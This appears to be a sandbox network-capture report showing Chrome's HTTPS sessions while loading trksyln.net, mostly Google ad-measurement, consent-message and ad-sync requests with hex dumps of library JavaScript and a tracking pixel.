2024-10-31 18:19:32 UTC	804	OUT	GET /ads/measurement/l?ebcid=ALh7CaSlXYrtDuu4pAJLur9Ub7fKrWLtJq0XiZy1q4NDaN8Rfcv23oFmtaozMUOehwQh26-ih-zXtEMC6NlEgBM1zyLKhoFM_w HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:32 UTC	314	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:32 GMT Server: jumble_frontend_server Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49833	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:32 UTC	804	OUT	GET /ads/measurement/l?ebcid=ALh7CaQdsNBo9WRTFG5NvmpTSV1NED_cHunzkusyqhhJ8wsHTvFR9ycGSGsL-T38B7ZwdJYBS7dgA391Exs0qr0ZBQUJ4_OAxg HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:32 UTC	314	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:32 GMT Server: jumble_frontend_server Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49835	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:33 UTC	695	OUT	GET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:33 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:33 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ZMBQPdUUrF3a1EQm8wMWiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1ZBikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhbg5tk7p38kmsGHuy1AljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAP5U_dA" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 36 65 64 65 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 Data Ascii: 6edeif (typeof __googlefc === 'undefined' \|\| typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{_._F_tog
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d Data Ascii: e:function(){return fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length==
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 66 28 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 69 73 2e 68 61 28 67 29 3b 65 6c 73 65 7b 61 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 Data Ascii: f(g instanceof e)this.ha(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?t
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 3d 5f 2e 71 28 67 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6b 2e 64 6f 6e 65 3f 63 28 5b 5d 29 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 77 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 44 29 7b 41 5b 78 5d 3d 44 3b 42 2d 2d 3b 42 3d 3d 30 26 26 6d 28 41 29 7d 7d 76 61 72 20 41 3d 5b 5d 2c 42 3d 30 3b 64 6f 20 41 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 42 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 77 28 41 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c Data Ascii: =_.q(g),k=h.next();return k.done?c([]):new e(function(m,n){function w(x){return function(D){A[x]=D;B--;B==0&&m(A)}}var A=[],B=0;do A.push(void 0),B++,c(k.value).mb(w(A.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 3b 72 65 74 75 72 6e 20 68 7d 29 3b 0a 70 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c Data Ascii: ;return h});p("Map",function(a){if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"\|\|k.size!=1\|\|k.get({x:4})\|\|k.set({x:4},"t")!=k\|\|
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 2c 6b 29 7b 76 61 72 20 6d 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 66 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6d 29 7b 66 6f 72 28 3b 6d 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6d 3d 6d 2e 71 61 3b 66 6f 72 28 3b 6d 2e 6e 65 78 74 21 3d 6d 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 Data Ascii: ,k){var m=h[1];return fa(function(){if(m){for(;m.head!=h[1];)m=m.qa;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 29 3b 0a 70 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 Data Ascii: exOf(b,c\|\|0)!==-1}});p("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 3b 64 3d 4e 75 6d 62 65 72 28 64 29 3b 64 3c 30 26 26 28 64 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 65 2b 64 29 29 3b 66 6f 72 28 63 3d 4e 75 6d 62 65 72 28 63 7c 7c 30 29 3b 63 3c 64 3b 63 2b 2b 29 74 68 69 73 5b 63 5d 3d 62 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e Data Ascii: ;d=Number(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c\|\|0);c<d;c++)this[c]=b;return this}});var ta=function(a){return a?a:Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("In
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 21 3d 2d 31 7d 3b 45 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 Data Ascii: !=-1};Ea=function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")\|\|_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))\|\|_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){v
2024-10-31 18:19:33 UTC	1936	IN	Data Raw: 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 Data Ascii: sb=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49838	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:33 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 155 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:33 UTC	155	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 33 34 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 33 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398772342,null,null,[[3,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
2024-10-31 18:19:34 UTC	1861	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:34 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-AFmTRh1yQiqhmXdzvJ0aWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmLw0ZBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAg3WbBZRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEA7zwoEg" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49856	34.160.236.64	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:33 UTC	783	OUT	GET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1 Host: odr.mookie1.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	298	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Type: image/gif Content-Length: 42 Last-Modified: Thu, 19 Oct 2023 06:07:48 GMT ETag: "6530c7b4-2a" Accept-Ranges: bytes Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:34 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49839	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	798	OUT	GET /pagead/drt/ui HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
